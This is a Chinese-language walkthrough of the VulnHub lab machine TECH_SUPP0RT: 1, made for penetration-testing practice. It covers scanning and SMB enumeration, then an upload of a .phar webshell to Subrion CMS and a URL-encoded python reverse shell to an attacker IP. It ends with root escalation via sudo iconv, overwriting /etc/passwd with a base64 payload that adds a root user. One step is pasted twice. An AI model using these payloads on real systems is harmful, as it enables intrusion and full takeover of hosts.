Vulnhub_TECH_SUPP0RT: 1

Posted NowSec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub_TECH_SUPP0RT: 1相关的知识,希望对你有一定的参考价值。


主机信息

kali:192.168.1.
Hackathon2:192.168.1.5

信息收集

使用nmap对目标主机进行扫描

nmap -T4 -A -v -p- 192.168.1.5

扫描结果

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 05:24 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 05:24
Completed NSE at 05:24, 0.00s elapsed
Initiating NSE at 05:24
Completed NSE at 05:24, 0.00s elapsed
Initiating NSE at 05:24
Completed NSE at 05:24, 0.00s elapsed
Initiating ARP Ping Scan at 05:24
Scanning 192.168.1.5 [1 port]
Completed ARP Ping Scan at 05:24, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:24
Completed Parallel DNS resolution of 1 host. at 05:24, 1.11s elapsed
Initiating SYN Stealth Scan at 05:24
Scanning techsupport (192.168.1.5) [65535 ports]
Discovered open port 445/tcp on 192.168.1.5
Discovered open port 139/tcp on 192.168.1.5
Discovered open port 80/tcp on 192.168.1.5
Discovered open port 22/tcp on 192.168.1.5
Completed SYN Stealth Scan at 05:24, 2.04s elapsed (65535 total ports)
Initiating Service scan at 05:24
Scanning 4 services on techsupport (192.168.1.5)
Completed Service scan at 05:25, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against techsupport (192.168.1.5)
NSE: Script scanning 192.168.1.5.
Initiating NSE at 05:25
Completed NSE at 05:25, 5.40s elapsed
Initiating NSE at 05:25
Completed NSE at 05:25, 0.01s elapsed
Initiating NSE at 05:25
Completed NSE at 05:25, 0.00s elapsed
Nmap scan report for techsupport (192.168.1.5)
Host is up (0.00053s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:18:42:58 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.047 days (since Thu Jan  7 03:16:58 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=251 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Host script results:
|_clock-skew: mean: -1h50m03s, deviation: 3h10m30s, median: -5s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\\x00
|   Domain name: \\x00
|   FQDN: techsupport
|_  System time: 2021-07-24T14:55:09+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-24T09:25:07
|_  start_date: N/A


TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms techsupport (192.168.1.5)


NSE: Script Post-scanning.
Initiating NSE at 05:25
Completed NSE at 05:25, 0.00s elapsed
Initiating NSE at 05:25
Completed NSE at 05:25, 0.00s elapsed
Initiating NSE at 05:25
Completed NSE at 05:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.69 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

使用dirb扫描网站目录发现 test和wp

打开test发现是一个防微软网站,但网站均无法点击

访问wordpress目录打开没有找到有价值的信息

由于目标主机开放了445端口,所以使用enum4linux进行扫描发现了一个共享目录

enum4linux -A 192.168.1.5


使用smbclient连接共享目录,密码000000

登录后查看文件


经过尝试文件中的密文解密顺序为base58>base32>base64

使用解密后的密码登录wp发现无法登录

然后根据第根据提示的第二点,有一个subrion站点,需要在panel中修复,找到网站的后台

使用解密后的密码进行登录发现可以登录成功

通过观察,这个网站是Subrion CMS v4.2.1

GETSHELL

使用expliot-db找到一个RCE的exp

使用脚本无法上传

根据脚本内容创建shell.[har

然后将shell上传到网站

执行命令

使用python反弹一个shell

http://192.168.1.5/subrion/uploads/shell.phar?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.6%22,4321));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27


再使用python获取一个交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash");'


找了一圈没找到subrion的配置文件,但找到了wp的数据库配置文件

define( 'DB_NAME', 'wpdb' );


/** mysql database username */
define( 'DB_USER', 'support' );


/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );


/** MySQL hostname */
define( 'DB_HOST', 'localhost' )

登录数据库
<ww/html/wordpress$ mysql -h 127.0.0.1 -u support -p                         
Enter password: ImAScammerLOL!123!


Welcome to the MariaDB monitor.  Commands end with ; or \\g.
Your MariaDB connection id is 38862
Server version: 10.0.38-MariaDB-0ubuntu0.16.04.1 Ubuntu 16.04


Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.


Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.


MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wpdb               |
+--------------------+
2 rows in set (0.00 sec)


MariaDB [(none)]> use wpdb
use wpdb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A


Database changed
MariaDB [wpdb]> show tables;
show tables;
+-----------------------+
| Tables_in_wpdb        |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)


wp的密文没有解出明文

提权

然后尝试用这个密码可以切换到主机的另一个用户

发现有一个可以sudo免密执行的文件

设置LFILE=/etc/shadow,然后查看

iconv参数说明

-c : 静默丢弃不能识别的字符,而不是终止转换。
-f,--from-code=[encoding]:指定待转换文件的编码。
-t,--to-code=[encoding]:指定目标编码。
-l,--list:列出已知的字符编码。
-o,--output=[file] :列出指定输出文件,而非默认输出到标准输出。
-s,--silent:关闭警告。
--verbose:显示进度信息。
-?, --help:显示帮助信息。
--usage:显示简要使用方法。
-V,--version:显示版本信息。

利用GTFOBins中给出的文件写入命令,构造下面的payload

echo "DATA" | iconv -f 8859_1 -t 8859_1 -o "$LFILE"
# $LFILE可以提前指定或在命令中写绝对路径

第一步:创建一个密码

python3 -c "import crypt; print(crypt.crypt('password'))"$6$o4e7RSldnSqVr908$VUIXnA0II5v1f0OaFmfo/n7/sYapLOphCas1xBGCNRUck3MKq65AiULC7OL5qMlBNu2CCU2PXGkZmS7T21HpV0

第二步:根据shadow文件写入一行用户密码

python3 -c "import crypt; print(crypt.crypt('password'))"$6$o4e7RSldnSqVr908$VUIXnA0II5v1f0OaFmfo/n7/sYapLOphCas1xBGCNRUck3MKq65AiULC7OL5qMlBNu2CCU2PXGkZmS7T21HpV0

第三步:将数据写入到/etc/passwd,并使用base64进行编码
最后切换到我们创建的用户得到root权限,查看flag

echo cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtdGltZXN5bmM6eDoxMDA6MTAyOnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb24sLCw6L3J1bi9zeXN0ZW1kOi9iaW4vZmFsc2UKc3lzdGVtZC1uZXR3b3JrOng6MTAxOjEwMzpzeXN0ZW1kIE5ldHdvcmsgTWFuYWdlbWVudCwsLDovcnVuL3N5c3RlbWQvbmV0aWY6L2Jpbi9mYWxzZQpzeXN0ZW1kLXJlc29sdmU6eDoxMDI6MTA0OnN5c3RlbWQgUmVzb2x2ZXIsLCw6L3J1bi9zeXN0ZW1kL3Jlc29sdmU6L2Jpbi9mYWxzZQpzeXN0ZW1kLWJ1cy1wcm94eTp4OjEwMzoxMDU6c3lzdGVtZCBCdXMgUHJveHksLCw6L3J1bi9zeXN0ZW1kOi9iaW4vZmFsc2UKc3lzbG9nOng6MTA0OjEwODo6L2hvbWUvc3lzbG9nOi9iaW4vZmFsc2UKX2FwdDp4OjEwNTo2NTUzNDo6L25vbmV4aXN0ZW50Oi9iaW4vZmFsc2UKbHhkOng6MTA2OjY1NTM0OjovdmFyL2xpYi9seGQvOi9iaW4vZmFsc2UKbWVzc2FnZWJ1czp4OjEwNzoxMTE6Oi92YXIvcnVuL2RidXM6L2Jpbi9mYWxzZQp1dWlkZDp4OjEwODoxMTI6Oi9ydW4vdXVpZGQ6L2Jpbi9mYWxzZQpkbnNtYXNxOng6MTA5OjY1NTM0OmRuc21hc3EsLCw6L3Zhci9saWIvbWlzYzovYmluL2ZhbHNlCnNzaGQ6eDoxMTA6NjU1MzQ6Oi92YXIvcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kc2NhbXNpdGU6eDoxMDAwOjEwMDA6c2NhbW1lciwsLDovaG9tZS9zY2Ftc2l0ZTovYmluL2Jhc2gKbXlzcWw6eDoxMTE6MTE5Ok15U1FMIFNlcnZlciwsLDovbm9uZXhpc3RlbnQ6L2Jpbi9mYWxzZQpoYWNrZWQ6JDYkbzRlN1JTbGRuU3FWcjkwOCRWVUlYbkEwSUk1djFmME9hRm1mby9uNy9zWWFwTE9waENhczF4QkdDTlJVY2szTUtxNjVBaVVMQzdPTDVxTWxCTnUyQ0NVMlBYR2tabVM3VDIxSHBWMDowOjA6cm9vdDovcm9vdDovYmluL2Jhc2g=|base64 -d | sudo iconv -f 8859_1 -t 8859_1 -o "/etc/passwd"

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

以上是关于Vulnhub_TECH_SUPP0RT: 1的主要内容,如果未能解决你的问题,请参考以下文章

wrjhdiqd0Supp0rt(支持Ml配置和注

2017/11/1模拟赛

《网络¥安全联盟站》——星球周报

bzoj 3786 星系探索 dfs+splay

BZOJ3786星系探索 DFS序+Splay

刷题BZOJ 4998 星球联盟